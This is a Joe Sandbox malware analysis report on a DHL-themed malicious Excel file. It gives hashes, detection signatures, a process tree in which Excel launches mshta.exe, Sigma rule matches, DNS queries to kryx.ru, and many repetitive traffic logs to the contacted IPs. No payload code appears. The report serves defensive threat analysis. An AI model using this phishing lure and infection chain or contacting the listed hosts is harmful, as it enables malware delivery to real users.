Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL 733988905ZHH.xla.xlsx

Overview

General Information

Sample name:DHL 733988905ZHH.xla.xlsx
Analysis ID:1639267
MD5:221f228dfa20495a79346d343e9247dc
SHA1:9cb6b9b2789a5a227c6561790ea353507713f98c
SHA256:279212a280629727edeb1bab801d30116de12ed162400753638a7ec51523aa1b
Tags:DHLxlaxlsxuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6544 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 3216 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 4716 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 608 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\DHL 733988905ZHH.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Microsoft Office Child Process
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6544, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 3216, ProcessName: mshta.exe
Sigma detected: Excel Network Connections
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.225.72.170, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6544, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49697
Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49697, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6544, Protocol: tcp, SourceIp: 188.225.72.170, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-15T08:45:19.261306+010020283713Unknown Traffic192.168.2.74970113.107.246.60443TCP
2025-03-15T08:45:26.598125+010020283713Unknown Traffic192.168.2.74970413.107.246.60443TCP
2025-03-15T08:45:26.600057+010020283713Unknown Traffic192.168.2.74970313.107.246.60443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: DHL 733988905ZHH.xla.xlsxAvira: detected
Multi AV Scanner detection for submitted file
Source: DHL 733988905ZHH.xla.xlsxVirustotal: Detection: 50%Perma Link
Source: DHL 733988905ZHH.xla.xlsxReversingLabs: Detection: 33%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49701 version: TLS 1.2

Software Vulnerabilities

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: kryx.ru
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
